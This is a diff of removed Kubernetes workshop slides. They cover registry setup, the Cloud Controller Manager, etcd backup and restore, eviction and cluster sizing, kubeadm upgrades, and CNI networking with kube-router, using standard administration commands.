- [TLS management](https://kubernetes.io/docs/tasks/tls/managing-tls-in-a-cluster/)
- [Authenticating with bootstrap tokens](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/)
- [TLS bootstrapping](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-tls-bootstrapping/)
- [kubeadm token](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-token/) command
- [kubeadm join](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-join/) command (has details about [the join workflow](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-join/#join-workflow))

View File

@@ -1,40 +0,0 @@
## Using images from the Docker Hub
- For everyone's convenience, we took care of building DockerCoins images
- We pushed these images to the DockerHub, under the [dockercoins](https://hub.docker.com/u/dockercoins) user
- These images are *tagged* with a version number, `v0.1`
- The full image names are therefore:
- `dockercoins/hasher:v0.1`
- `dockercoins/rng:v0.1`
- `dockercoins/webui:v0.1`
- `dockercoins/worker:v0.1`
---
## Setting `$REGISTRY` and `$TAG`
- In the upcoming exercises and labs, we use a couple of environment variables:
- `$REGISTRY` as a prefix to all image names
- `$TAG` as the image version tag
- For example, the worker image is `$REGISTRY/worker:$TAG`
- If you copy-paste the commands in these exercises:
**make sure that you set `$REGISTRY` and `$TAG` first!**
- For example:
```
export REGISTRY=dockercoins TAG=v0.1
```
(this will expand `$REGISTRY/worker:$TAG` to `dockercoins/worker:v0.1`)

View File

@@ -1,235 +0,0 @@
## Self-hosting our registry
*Note: this section shows how to run the Docker
open source registry and use it to ship images
on our cluster. While this method works fine,
we recommend that you consider using one of the
hosted, free automated build services instead.
It will be much easier!*
*If you need to run a registry on premises,
this section gives you a starting point, but
you will need to make a lot of changes so that
the registry is secured, highly available, and
so that your build pipeline is automated.*
---
## Using the open source registry
- We need to run a `registry` container
- It will store images and layers to the local filesystem
<br/>(but you can add a config file to use S3, Swift, etc.)
- Docker *requires* TLS when communicating with the registry
- unless for registries on `127.0.0.0/8` (i.e. `localhost`)
- or with the Engine flag `--insecure-registry`
- Our strategy: publish the registry container on a NodePort,
<br/>so that it's available through `127.0.0.1:xxxxx` on each node
---
## Deploying a self-hosted registry
- We will deploy a registry container, and expose it with a NodePort
.exercise[
- Create the registry service:
```bash
kubectl create deployment registry --image=registry
```
- Expose it on a NodePort:
```bash
kubectl expose deploy/registry --port=5000 --type=NodePort
```
]
---
## Connecting to our registry
- We need to find out which port has been allocated
.exercise[
- View the service details:
```bash
kubectl describe svc/registry
```
- Get the port number programmatically:
```bash
NODEPORT=$(kubectl get svc/registry -o json | jq .spec.ports[0].nodePort)
REGISTRY=127.0.0.1:$NODEPORT
```
]
---
## Testing our registry
- A convenient Docker registry API route to remember is `/v2/_catalog`
.exercise[
<!-- ```hide kubectl wait deploy/registry --for condition=available```-->
- View the repositories currently held in our registry:
```bash
curl $REGISTRY/v2/_catalog
```
]
--
We should see:
```json
{"repositories":[]}
```
---
## Testing our local registry
- We can retag a small image, and push it to the registry
.exercise[
- Make sure we have the busybox image, and retag it:
```bash
docker pull busybox
docker tag busybox $REGISTRY/busybox
```
- Push it:
```bash
docker push $REGISTRY/busybox
```
]
---
## Checking again what's on our local registry
- Let's use the same endpoint as before
.exercise[
- Ensure that our busybox image is now in the local registry:
```bash
curl $REGISTRY/v2/_catalog
```
]
The curl command should now output:
```json
{"repositories":["busybox"]}
```
---
## Building and pushing our images
- We are going to use a convenient feature of Docker Compose
.exercise[
- Go to the `stacks` directory:
```bash
cd ~/container.training/stacks
```
- Build and push the images:
```bash
export REGISTRY
export TAG=v0.1
docker-compose -f dockercoins.yml build
docker-compose -f dockercoins.yml push
```
]
Let's have a look at the `dockercoins.yml` file while this is building and pushing.
---
```yaml
version: "3"
services:
rng:
build: dockercoins/rng
image: ${REGISTRY-127.0.0.1:5000}/rng:${TAG-latest}
deploy:
mode: global
...
redis:
image: redis
...
worker:
build: dockercoins/worker
image: ${REGISTRY-127.0.0.1:5000}/worker:${TAG-latest}
...
deploy:
replicas: 10
```
.warning[Just in case you were wondering ... Docker "services" are not Kubernetes "services".]
---
class: extra-details
## Avoiding the `latest` tag
.warning[Make sure that you've set the `TAG` variable properly!]
- If you don't, the tag will default to `latest`
- The problem with `latest`: nobody knows what it points to!
- the latest commit in the repo?
- the latest commit in some branch? (Which one?)
- the latest tag?
- some random version pushed by a random team member?
- If you keep pushing the `latest` tag, how do you roll back?
- Image tags should be meaningful, i.e. correspond to code branches, tags, or hashes
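One common convention is to derive the tag from git (adapt to your own workflow):
```bash
export TAG=$(git describe --tags --always --dirty)
# ...or simply use the short commit hash:
export TAG=$(git rev-parse --short HEAD)
```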
---
## Checking the content of the registry
- All our images should now be in the registry
.exercise[
- Re-run the same `curl` command as earlier:
```bash
curl $REGISTRY/v2/_catalog
```
]
*In these slides, all the commands to deploy
DockerCoins will use a $REGISTRY environment
variable, so that we can quickly switch from
the self-hosted registry to pre-built images
hosted on the Docker Hub. So make sure that
this $REGISTRY variable is set correctly when
running the exercises!*

View File

@@ -1,144 +0,0 @@
# The Cloud Controller Manager
- Kubernetes has many features that are cloud-specific
(e.g. providing cloud load balancers when a Service of type LoadBalancer is created)
- These features were initially implemented in API server and controller manager
- Since Kubernetes 1.6, these features are available through a separate process:
the *Cloud Controller Manager*
- The CCM is optional, but if we run in a cloud, we probably want it!
---
## Cloud Controller Manager duties
- Creating and updating cloud load balancers
- Configuring routing tables in the cloud network (specific to GCE)
- Updating node labels to indicate region, zone, instance type ...
- Obtaining the node name and internal/external addresses from the cloud metadata service
- Deleting nodes from Kubernetes when they're deleted in the cloud
- Managing *some* volumes (e.g. ELBs, AzureDisks ...)
(Eventually, volumes will be managed by the CSI)
---
## In-tree vs. out-of-tree
- A number of cloud providers are supported "in-tree"
(in the main kubernetes/kubernetes repository on GitHub)
- More cloud providers are supported "out-of-tree"
(with code in different repositories)
- There is an [ongoing effort](https://github.com/kubernetes/kubernetes/tree/master/pkg/cloudprovider) to move everything to out-of-tree providers
---
## In-tree providers
The following providers are actively maintained:
- Amazon Web Services
- Azure
- Google Compute Engine
- IBM Cloud
- OpenStack
- VMware vSphere
These ones are less actively maintained:
- Apache CloudStack
- oVirt
- VMware Photon
---
## Out-of-tree providers
The list includes the following providers:
- DigitalOcean
- keepalived (not exactly a cloud; provides VIPs for load balancers)
- Linode
- Oracle Cloud Infrastructure
(And possibly others; there is no central registry for these.)
---
## Audience questions
- What kind of clouds are you using / planning to use?
- What kind of details would you like to see in this section?
- Would you appreciate details on clouds that you don't / won't use?
---
## Cloud Controller Manager in practice
- Write a configuration file
(typically `/etc/kubernetes/cloud.conf`)
- Run the CCM process
(on self-hosted clusters, this can be a DaemonSet selecting the control plane nodes)
- Start kubelet with `--cloud-provider=external`
- When using managed clusters, this is done automatically
- There is very little documentation to write the configuration file
(except for OpenStack)
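Very roughly, the moving parts look like this (a sketch; the provider name, flags, and paths below are examples, not a tested setup):
```bash
# (1) On each node: kubelet defers cloud-specific logic to an external controller
kubelet --cloud-provider=external   # ...plus the usual kubelet flags

# (2) In the control plane: run the CCM with the provider-specific config file
cloud-controller-manager \
  --cloud-provider=openstack \
  --cloud-config=/etc/kubernetes/cloud.conf \
  --kubeconfig=/etc/kubernetes/cloud-controller-manager.conf
```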
---
## Bootstrapping challenges
- When a node joins the cluster, it needs to obtain a signed TLS certificate
- That certificate must contain the node's addresses
- These addresses are provided by the Cloud Controller Manager
(at least the external address)
- To get these addresses, the node needs to communicate with the control plane
- ... Which means joining the cluster
(The problem didn't occur when cloud-specific code was running in kubelet: kubelet could obtain the required information directly from the cloud provider's metadata service.)
---
## More information about CCM
- CCM configuration and operation is highly specific to each cloud provider
(which is why this section remains very generic)
- The Kubernetes documentation has *some* information:
- [architecture and diagrams](https://kubernetes.io/docs/concepts/architecture/cloud-controller/)
- [configuration](https://kubernetes.io/docs/concepts/cluster-administration/cloud-providers/) (mainly for OpenStack)
- [deployment](https://kubernetes.io/docs/tasks/administer-cluster/running-cloud-controller/)

View File

@@ -1,362 +0,0 @@
# Backing up clusters
- Backups can have multiple purposes:
- disaster recovery (servers or storage are destroyed or unreachable)
- error recovery (human or process has altered or corrupted data)
- cloning environments (for testing, validation ...)
- Let's see the strategies and tools available with Kubernetes!
---
## Important
- Kubernetes helps us with disaster recovery
(it gives us replication primitives)
- Kubernetes helps us to clone / replicate environments
(all resources can be described with manifests)
- Kubernetes *does not* help us with error recovery
- We still need to backup / snapshot our data:
- with database backups (mysqldump, pgdump, etc.)
- and/or snapshots at the storage layer
- and/or traditional full disk backups
---
## In a perfect world ...
- The deployment of our Kubernetes clusters is automated
(recreating a cluster takes less than a minute of human time)
- All the resources (Deployments, Services...) on our clusters are under version control
(never use `kubectl run`; always apply YAML files coming from a repository)
- Stateful components are either:
- stored on systems with regular snapshots
- backed up regularly to an external, durable storage
- outside of Kubernetes
---
## Kubernetes cluster deployment
- If our deployment system isn't fully automated, it should at least be documented
- Litmus test: how long does it take to deploy a cluster ...
- for a senior engineer?
- for a new hire?
- Does it require external intervention?
(e.g. provisioning servers, signing TLS certs ...)
---
## Plan B
- Full machine backups of the control plane can help
- If the control plane is in pods (or containers), pay attention to storage drivers
(if the backup mechanism is not container-aware, the backups can take way more resources than they should, or even be unusable!)
- If the previous sentence worries you:
**automate the deployment of your clusters!**
---
## Managing our Kubernetes resources
- Ideal scenario:
- never create a resource directly on a cluster
- push to a code repository
- a special branch (`production` or even `master`) gets automatically deployed
- Some folks call this "GitOps"
(it's the logical evolution of configuration management and infrastructure as code)
---
## GitOps in theory
- What do we keep in version control?
- For very simple scenarios: source code, Dockerfiles, scripts
- For real applications: add resources (as YAML files)
- For applications deployed multiple times: Helm, Kustomize ...
(staging and production count as "multiple times")
---
## GitOps tooling
- Various tools exist (Weave Flux, GitKube...)
- These tools are still very young
- You still need to write YAML for all your resources
- There is no tool to:
- list *all* resources in a namespace
- get resource YAML in a canonical form
- diff YAML descriptions with current state
---
## GitOps in practice
- Start describing your resources with YAML
- Leverage a tool like Kustomize or Helm
- Make sure that you can easily deploy to a new namespace
(or even better: to a new cluster)
- When tooling matures, you will be ready
---
## Plan B
- What if we can't describe everything with YAML?
- What if we manually create resources and forget to commit them to source control?
- What about global resources, that don't live in a namespace?
- How can we be sure that we saved *everything*?
---
## Backing up etcd
- All objects are saved in etcd
- etcd data should be relatively small
(and therefore, quick and easy to back up)
- Two options to back up etcd:
- snapshot the data directory
- use `etcdctl snapshot`
---
## Making an etcd snapshot
- The basic command is simple:
```bash
etcdctl snapshot save <filename>
```
- But we also need to specify:
- an environment variable to specify that we want etcdctl v3
- the address of the server to back up
- the path to the key, certificate, and CA certificate
<br/>(if our etcd uses TLS certificates)
---
## Snapshotting etcd on kubeadm
- The following command will work on clusters deployed with kubeadm
(and maybe others)
- It should be executed on a master node
```bash
docker run --rm --net host -v $PWD:/vol \
-v /etc/kubernetes/pki/etcd:/etc/kubernetes/pki/etcd:ro \
-e ETCDCTL_API=3 k8s.gcr.io/etcd:3.3.10 \
etcdctl --endpoints=https://[127.0.0.1]:2379 \
--cacert=/etc/kubernetes/pki/etcd/ca.crt \
--cert=/etc/kubernetes/pki/etcd/healthcheck-client.crt \
--key=/etc/kubernetes/pki/etcd/healthcheck-client.key \
snapshot save /vol/snapshot
```
- It will create a file named `snapshot` in the current directory
---
## How can we remember all these flags?
- Look at the static pod manifest for etcd
(in `/etc/kubernetes/manifests`)
- The healthcheck probe is calling `etcdctl` with all the right flags
😉👍✌️
- Exercise: write the YAML for a batch job to perform the backup
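Here is a rough, untested sketch of what that batch job could look like (image tag, paths, node selector, and tolerations are assumptions to adjust to your cluster):
```bash
kubectl create -f- <<EOF
apiVersion: batch/v1
kind: Job
metadata:
  name: etcd-backup
spec:
  template:
    spec:
      hostNetwork: true
      nodeSelector:
        node-role.kubernetes.io/master: ""
      tolerations:
      - key: node-role.kubernetes.io/master
        effect: NoSchedule
      restartPolicy: Never
      containers:
      - name: etcdctl
        image: k8s.gcr.io/etcd:3.3.10
        env:
        - name: ETCDCTL_API
          value: "3"
        command:
        - etcdctl
        - --endpoints=https://127.0.0.1:2379
        - --cacert=/etc/kubernetes/pki/etcd/ca.crt
        - --cert=/etc/kubernetes/pki/etcd/healthcheck-client.crt
        - --key=/etc/kubernetes/pki/etcd/healthcheck-client.key
        - snapshot
        - save
        - /backup/snapshot
        volumeMounts:
        - name: pki
          mountPath: /etc/kubernetes/pki/etcd
          readOnly: true
        - name: backup
          mountPath: /backup
      volumes:
      - name: pki
        hostPath:
          path: /etc/kubernetes/pki/etcd
      - name: backup
        hostPath:
          path: /var/backups/etcd
EOF
```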
---
## Restoring an etcd snapshot
- ~~Execute exactly the same command, but replacing `save` with `restore`~~
(Believe it or not, doing that will *not* do anything useful!)
- The `restore` command does *not* load a snapshot into a running etcd server
- The `restore` command creates a new data directory from the snapshot
(it's an offline operation; it doesn't interact with an etcd server)
- It will create a new data directory in a temporary container
(leaving the running etcd node untouched)
---
## When using kubeadm
1. Create a new data directory from the snapshot:
```bash
sudo rm -rf /var/lib/etcd
docker run --rm -v /var/lib:/var/lib -v $PWD:/vol \
-e ETCDCTL_API=3 k8s.gcr.io/etcd:3.3.10 \
etcdctl snapshot restore /vol/snapshot --data-dir=/var/lib/etcd
```
2. Provision the control plane, using that data directory:
```bash
sudo kubeadm init \
--ignore-preflight-errors=DirAvailable--var-lib-etcd
```
3. Rejoin the other nodes
---
## The fine print
- This only saves etcd state
- It **does not** save persistent volumes and local node data
- Some critical components (like the pod network) might need to be reset
- As a result, our pods might have to be recreated, too
- If we have proper liveness checks, this should happen automatically
---
## More information about etcd backups
- [Kubernetes documentation](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#built-in-snapshot) about etcd backups
- [etcd documentation](https://coreos.com/etcd/docs/latest/op-guide/recovery.html#snapshotting-the-keyspace) about snapshots and restore
- [A good blog post by elastisys](https://elastisys.com/2018/12/10/backup-kubernetes-how-and-why/) explaining how to restore a snapshot
- [Another good blog post by consol labs](https://labs.consol.de/kubernetes/2018/05/25/kubeadm-backup.html) on the same topic
---
## Don't forget ...
- Also back up the TLS information
(at the very least: CA key and cert; API server key and cert)
- With clusters provisioned by kubeadm, this is in `/etc/kubernetes/pki`
- If you don't:
- you will still be able to restore etcd state and bring everything back up
- you will need to redistribute user certificates
.warning[**TLS information is highly sensitive!
<br/>Anyone who has it has full access to your cluster!**]
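A minimal way to capture that information on a cluster deployed with kubeadm (store the archive somewhere safe, and treat it as the highly sensitive material it is):
```bash
sudo tar czf k8s-pki-backup-$(date +%F).tar.gz /etc/kubernetes/pki
```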
---
## Stateful services
- It's totally fine to keep your production databases outside of Kubernetes
*Especially if you have only one database server!*
- Feel free to put development and staging databases on Kubernetes
(as long as they don't hold important data)
- Using Kubernetes for stateful services makes sense if you have *many*
(because then you can leverage Kubernetes automation)
---
## Snapshotting persistent volumes
- Option 1: snapshot volumes out of band
(with the API/CLI/GUI of our SAN/cloud/...)
- Option 2: storage system integration
(e.g. [Portworx](https://docs.portworx.com/portworx-install-with-kubernetes/storage-operations/create-snapshots/) can [create snapshots through annotations](https://docs.portworx.com/portworx-install-with-kubernetes/storage-operations/create-snapshots/snaps-annotations/#taking-periodic-snapshots-on-a-running-pod))
- Option 3: [snapshots through Kubernetes API](https://kubernetes.io/blog/2018/10/09/introducing-volume-snapshot-alpha-for-kubernetes/)
(now in alpha for a few storage providers: GCE, OpenSDS, Ceph, Portworx)
---
## More backup tools
- [Stash](https://appscode.com/products/stash/)
back up Kubernetes persistent volumes
- [ReShifter](https://github.com/mhausenblas/reshifter)
cluster state management
- ~~Heptio Ark~~ [Velero](https://github.com/heptio/velero)
full cluster backup
- [kube-backup](https://github.com/pieterlange/kube-backup)
simple scripts to save resource YAML to a git repository

View File

@@ -1,167 +0,0 @@
# Cluster sizing
- What happens when the cluster gets full?
- How can we scale up the cluster?
- Can we do it automatically?
- What are other methods to address capacity planning?
---
## When are we out of resources?
- kubelet monitors node resources:
- memory
- node disk usage (typically the root filesystem of the node)
- image disk usage (where container images and RW layers are stored)
- For each resource, we can provide two thresholds:
- a hard threshold (if it's met, it provokes immediate action)
- a soft threshold (provokes action only after a grace period)
- Resource thresholds and grace periods are configurable
(by passing kubelet command-line flags)
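For example, thresholds could be set with flags like these (values are purely illustrative, not recommendations):
```bash
# ...combined with the other usual kubelet flags
kubelet \
  --eviction-hard='memory.available<100Mi,nodefs.available<10%,imagefs.available<15%' \
  --eviction-soft='memory.available<500Mi' \
  --eviction-soft-grace-period='memory.available=1m30s'
```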
---
## What happens then?
- If disk usage is too high:
- kubelet will try to remove terminated pods
- then, it will try to *evict* pods
- If memory usage is too high:
- it will try to evict pods
- The node is marked as "under pressure"
- This temporarily prevents new pods from being scheduled on the node
---
## Which pods get evicted?
- kubelet looks at the pods' QoS and PriorityClass
- First, pods with BestEffort QoS are considered
- Then, pods with Burstable QoS exceeding their *requests*
(but only if the exceeding resource is the one that is low on the node)
- Finally, pods with Guaranteed QoS, and Burstable pods within their requests
- Within each group, pods are sorted by PriorityClass
- If there are pods with the same PriorityClass, they are sorted by usage excess
(i.e. the pods whose usage exceeds their requests the most are evicted first)
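To see how our own pods would rank, we can display their QoS class and priority class:
```bash
kubectl get pods -o custom-columns=NAME:.metadata.name,QOS:.status.qosClass,PRIORITY:.spec.priorityClassName
```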
---
class: extra-details
## Eviction of Guaranteed pods
- *Normally*, pods with Guaranteed QoS should not be evicted
- A chunk of resources is reserved for node processes (like kubelet)
- It is expected that these processes won't use more than this reservation
- If they do use more resources anyway, all bets are off!
- If this happens, kubelet must evict Guaranteed pods to preserve node stability
(or Burstable pods that are still within their requested usage)
---
## What happens to evicted pods?
- The pod is terminated
- It is marked as `Failed` at the API level
- If the pod was created by a controller, the controller will recreate it
- The pod will be recreated on another node, *if there are resources available!*
- For more details about the eviction process, see:
- [this documentation page](https://kubernetes.io/docs/tasks/administer-cluster/out-of-resource/) about resource pressure and pod eviction,
- [this other documentation page](https://kubernetes.io/docs/concepts/configuration/pod-priority-preemption/) about pod priority and preemption.
---
## What if there are no resources available?
- Sometimes, a pod cannot be scheduled anywhere:
- all the nodes are under pressure,
- or the pod requests more resources than are available
- The pod then remains in `Pending` state until the situation improves
---
## Cluster scaling
- One way to improve the situation is to add new nodes
- This can be done automatically with the [Cluster Autoscaler](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler)
- The autoscaler will automatically scale up:
- if there are pods that failed to be scheduled
- The autoscaler will automatically scale down:
- if nodes have a low utilization for an extended period of time
---
## Restrictions, gotchas ...
- The Cluster Autoscaler only supports a few cloud infrastructures
(see [here](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler/cloudprovider) for a list)
- The Cluster Autoscaler cannot scale down nodes that have pods using:
- local storage
- affinity/anti-affinity rules preventing them from being rescheduled
- a restrictive PodDisruptionBudget
---
## Other ways to do capacity planning
- "Running Kubernetes without nodes"
- Systems like [Virtual Kubelet](https://virtual-kubelet.io/) or Kiyot can run pods using on-demand resources
- Virtual Kubelet can leverage e.g. ACI or Fargate to run pods
- Kiyot runs pods in ad-hoc EC2 instances (1 instance per pod)
- Economic advantage (no wasted capacity)
- Security advantage (stronger isolation between pods)
Check [this blog post](http://jpetazzo.github.io/2019/02/13/running-kubernetes-without-nodes-with-kiyot/) for more details.

View File

@@ -1,309 +0,0 @@
# Upgrading clusters
- It's *recommended* to run consistent versions across a cluster
(mostly to have feature parity and latest security updates)
- It's not *mandatory*
(otherwise, cluster upgrades would be a nightmare!)
- Components can be upgraded one at a time without problems
---
## Checking what we're running
- It's easy to check the version for the API server
.exercise[
- Log into node `test1`
- Check the version of kubectl and of the API server:
```bash
kubectl version
```
]
- In an HA setup with multiple API servers, they can have different versions
- Running the command above multiple times can return different values
---
## Node versions
- It's also easy to check the version of kubelet
.exercise[
- Check node versions (includes kubelet, kernel, container engine):
```bash
kubectl get nodes -o wide
```
]
- Different nodes can run different kubelet versions
- Different nodes can run different kernel versions
- Different nodes can run different container engines
---
## Control plane versions
- If the control plane is self-hosted (running in pods), we can check it
.exercise[
- Show image versions for all pods in `kube-system` namespace:
```bash
kubectl --namespace=kube-system get pods -o json \
| jq -r '
.items[]
| [.spec.nodeName, .metadata.name]
+
(.spec.containers[].image | split(":"))
| @tsv
' \
| column -t
```
]
---
## What version are we running anyway?
- When I say, "I'm running Kubernetes 1.11", is that the version of:
- kubectl
- API server
- kubelet
- controller manager
- something else?
---
## Other versions that are important
- etcd
- kube-dns or CoreDNS
- CNI plugin(s)
- Network controller, network policy controller
- Container engine
- Linux kernel
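Some of these can be checked through the API as well; a couple of hedged examples (the `k8s-app=kube-dns` label is what kubeadm uses for CoreDNS/kube-dns; other setups may label things differently):
```bash
# Kernel, container engine, and kubelet versions for each node:
kubectl get nodes -o custom-columns=NAME:.metadata.name,KERNEL:.status.nodeInfo.kernelVersion,RUNTIME:.status.nodeInfo.containerRuntimeVersion,KUBELET:.status.nodeInfo.kubeletVersion

# Image (and therefore version) used by the DNS add-on:
kubectl -n kube-system get pods -l k8s-app=kube-dns \
        -o jsonpath='{.items[*].spec.containers[*].image}'; echo
```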
---
## General guidelines
- To update a component, use whatever was used to install it
- If it's a distro package, update that distro package
- If it's a container or pod, update that container or pod
- If you used configuration management, update with that
---
## Know where your binaries come from
- Sometimes, we need to upgrade *quickly*
(when a vulnerability is announced and patched)
- If we are using an installer, we should:
- make sure it's using upstream packages
- or make sure that whatever packages it uses are current
- make sure we can tell it to pin specific component versions
---
## In practice
- We are going to update a few cluster components
- We will change the kubelet version on one node
- We will change the version of the API server
- We will work with cluster `test` (nodes `test1`, `test2`, `test3`)
---
## Updating kubelet
- These nodes have been installed using the official Kubernetes packages
- We can therefore use `apt` or `apt-get`
.exercise[
- Log into node `test3`
- View available versions for package `kubelet`:
```bash
apt show kubelet -a | grep ^Version
```
- Upgrade kubelet:
```bash
apt install kubelet=1.14.2-00
```
]
---
## Checking what we've done
.exercise[
- Log into node `test1`
- Check node versions:
```bash
kubectl get nodes -o wide
```
- Create a deployment and scale it to make sure that the node still works
]
---
## Updating the API server
- This cluster has been deployed with kubeadm
- The control plane runs in *static pods*
- These pods are started automatically by kubelet
(even when kubelet can't contact the API server)
- They are defined in YAML files in `/etc/kubernetes/manifests`
(this path is set by a kubelet command-line flag)
- kubelet automatically updates the pods when the files are changed
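For instance, on a kubeadm-installed node, we can peek at these manifests directly:
```bash
ls -l /etc/kubernetes/manifests/
```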
---
## Changing the API server version
- We will edit the YAML file to use a different image version
.exercise[
- Log into node `test1`
- Check API server version:
```bash
kubectl version
```
- Edit the API server pod manifest:
```bash
sudo vim /etc/kubernetes/manifests/kube-apiserver.yaml
```
- Look for the `image:` line, and update it to e.g. `v1.14.0`
]
---
## Checking what we've done
- The API server will be briefly unavailable while kubelet restarts it
.exercise[
- Check the API server version:
```bash
kubectl version
```
]
---
## Updating the whole control plane
- As an example, we'll use kubeadm to upgrade the entire control plane
(note: this is possible only because the cluster was installed with kubeadm)
.exercise[
- Check what will be upgraded:
```bash
sudo kubeadm upgrade plan
```
(Note: kubeadm is confused by our manual upgrade of the API server.
<br/>It thinks the cluster is running 1.14.0!)
<!-- ##VERSION## -->
- Perform the upgrade:
```bash
sudo kubeadm upgrade apply v1.14.2
```
]
---
## Updating kubelets
- After updating the control plane, we need to update each kubelet
- This requires running a special command on each node, to download the config
(this config is generated by kubeadm)
.exercise[
- Download the configuration on each node, and upgrade kubelet:
```bash
for N in 1 2 3; do
ssh test$N sudo kubeadm upgrade node config --kubelet-version v1.14.2
ssh test$N sudo apt install kubelet=1.14.2-00
done
```
]
---
## Checking what we've done
- All our nodes should now be updated to version 1.14.2
.exercise[
- Check nodes versions:
```bash
kubectl get nodes -o wide
```
]

View File

@@ -1,684 +0,0 @@
# The Container Network Interface
- Allows us to decouple network configuration from Kubernetes
- Implemented by *plugins*
- Plugins are executables that will be invoked by kubelet
- Plugins are responsible for:
- allocating IP addresses for containers
- configuring the network for containers
- Plugins can be combined and chained when it makes sense
---
## Combining plugins
- Interface could be created by e.g. `vlan` or `bridge` plugin
- IP address could be allocated by e.g. `dhcp` or `host-local` plugin
- Interface parameters (MTU, sysctls) could be tweaked by the `tuning` plugin
The reference plugins are available [here].
Look into each plugin's directory for its documentation.
[here]: https://github.com/containernetworking/plugins/tree/master/plugins
---
## How does kubelet know which plugins to use?
- The plugin (or list of plugins) is set in the CNI configuration
- The CNI configuration is a *single file* in `/etc/cni/net.d`
- If there are multiple files in that directory, the first one is used
(in lexicographic order)
- That path can be changed with the `--cni-conf-dir` flag of kubelet
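A quick way to check what is installed on a node (the directory may be empty, or not exist at all, before a pod network is set up):
```bash
ls -l /etc/cni/net.d/
cat /etc/cni/net.d/*.conf* 2>/dev/null
```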
---
## CNI configuration in practice
- When we set up the "pod network" (like Calico, Weave...) it ships a CNI configuration
(and sometimes, custom CNI plugins)
- Very often, that configuration (and plugins) is installed automatically
(by a DaemonSet featuring an initContainer with hostPath volumes)
- Examples:
- Calico [CNI config](https://github.com/projectcalico/calico/blob/1372b56e3bfebe2b9c9cbf8105d6a14764f44159/v2.6/getting-started/kubernetes/installation/hosted/calico.yaml#L25)
and [volume](https://github.com/projectcalico/calico/blob/1372b56e3bfebe2b9c9cbf8105d6a14764f44159/v2.6/getting-started/kubernetes/installation/hosted/calico.yaml#L219)
- kube-router [CNI config](https://github.com/cloudnativelabs/kube-router/blob/c2f893f64fd60cf6d2b6d3fee7191266c0fc0fe5/daemonset/generic-kuberouter.yaml#L10)
and [volume](https://github.com/cloudnativelabs/kube-router/blob/c2f893f64fd60cf6d2b6d3fee7191266c0fc0fe5/daemonset/generic-kuberouter.yaml#L73)
---
## Conf vs conflist
- There are two slightly different configuration formats
- Basic configuration format:
- holds configuration for a single plugin
- typically has a `.conf` name suffix
- has a `type` string field in the top-most structure
- [examples](https://github.com/containernetworking/cni/blob/master/SPEC.md#example-configurations)
- Configuration list format:
- can hold configuration for multiple (chained) plugins
- typically has a `.conflist` name suffix
- has a `plugins` list field in the top-most structure
- [examples](https://github.com/containernetworking/cni/blob/master/SPEC.md#network-configuration-lists)
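As an illustration, here is what a minimal (hypothetical) conflist chaining the `bridge` and `tuning` plugins could look like; the field names follow the CNI spec examples linked above, and we write it to `/tmp` so we don't interfere with the cluster's real configuration:
```bash
cat > /tmp/10-demo.conflist <<'EOF'
{
  "cniVersion": "0.3.1",
  "name": "demo",
  "plugins": [
    {
      "type": "bridge",
      "bridge": "cni0",
      "ipam": { "type": "host-local", "subnet": "10.1.0.0/16" }
    },
    {
      "type": "tuning",
      "sysctl": { "net.core.somaxconn": "512" }
    }
  ]
}
EOF
```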
---
class: extra-details
## How plugins are invoked
- Parameters are given through environment variables, including:
- CNI_COMMAND: desired operation (ADD, DEL, CHECK, or VERSION)
- CNI_CONTAINERID: container ID
- CNI_NETNS: path to network namespace file
- CNI_IFNAME: how the network interface should be named
- The network configuration must be provided to the plugin on stdin
(this avoids race conditions that could happen by passing a file path)
---
## In practice: kube-router
- We are going to set up a new cluster
- For this new cluster, we will use kube-router
- kube-router will provide the "pod network"
(connectivity with pods)
- kube-router will also provide internal service connectivity
(replacing kube-proxy)
---
## How kube-router works
- Very simple architecture
- Does not introduce new CNI plugins
(uses the `bridge` plugin, with `host-local` for IPAM)
- Pod traffic is routed between nodes
(no tunnel, no new protocol)
- Internal service connectivity is implemented with IPVS
- Can provide pod network and/or internal service connectivity
- kube-router daemon runs on every node
---
## What kube-router does
- Connect to the API server
- Obtain the local node's `podCIDR`
- Inject it into the CNI configuration file
(we'll use `/etc/cni/net.d/10-kuberouter.conflist`)
- Obtain the addresses of all nodes
- Establish a *full mesh* BGP peering with the other nodes
- Exchange routes over BGP
---
## What's BGP?
- BGP (Border Gateway Protocol) is the protocol used between internet routers
- It [scales](https://www.cidr-report.org/as2.0/)
pretty [well](https://www.cidr-report.org/cgi-bin/plota?file=%2fvar%2fdata%2fbgp%2fas2.0%2fbgp-active%2etxt&descr=Active%20BGP%20entries%20%28FIB%29&ylabel=Active%20BGP%20entries%20%28FIB%29&with=step)
(it is used to announce the 700k CIDR prefixes of the internet)
- It is spoken by many hardware routers from many vendors
- It also has many software implementations (Quagga, Bird, FRR...)
- Experienced network folks generally know it (and appreciate it)
- It is also used by Calico (another popular network system for Kubernetes)
- Using BGP allows us to interconnect our "pod network" with other systems
---
## The plan
- We'll work in a new cluster (named `kuberouter`)
- We will run a simple control plane (like before)
- ... But this time, the controller manager will allocate `podCIDR` subnets
- We will start kube-router with a DaemonSet
- This DaemonSet will start one instance of kube-router on each node
---
## Logging into the new cluster
.exercise[
- Log into node `kuberouter1`
- Clone the workshop repository:
```bash
git clone https://@@GITREPO@@
```
- Move to this directory:
```bash
cd container.training/compose/kube-router-k8s-control-plane
```
]
---
## Our control plane
- We will use a Compose file to start the control plane
- It is similar to the one we used with the `kubenet` cluster
- The API server is started with `--allow-privileged`
(because we will start kube-router in privileged pods)
- The controller manager is started with extra flags too:
`--allocate-node-cidrs` and `--cluster-cidr`
- We need to edit the Compose file to set the Cluster CIDR
---
## Starting the control plane
- Our cluster CIDR will be `10.C.0.0/16`
(where `C` is our cluster number)
.exercise[
- Edit the Compose file to set the Cluster CIDR:
```bash
vim docker-compose.yaml
```
- Start the control plane:
```bash
docker-compose up
```
]
---
## The kube-router DaemonSet
- In the same directory, there is a `kuberouter.yaml` file
- It contains the definition for a DaemonSet and a ConfigMap
- Before we load it, we also need to edit it
- We need to indicate the address of the API server
(because kube-router needs to connect to it to retrieve node information)
---
## Creating the DaemonSet
- The address of the API server will be `http://A.B.C.D:8080`
(where `A.B.C.D` is the address of `kuberouter1`, running the control plane)
.exercise[
- Edit the YAML file to set the API server address:
```bash
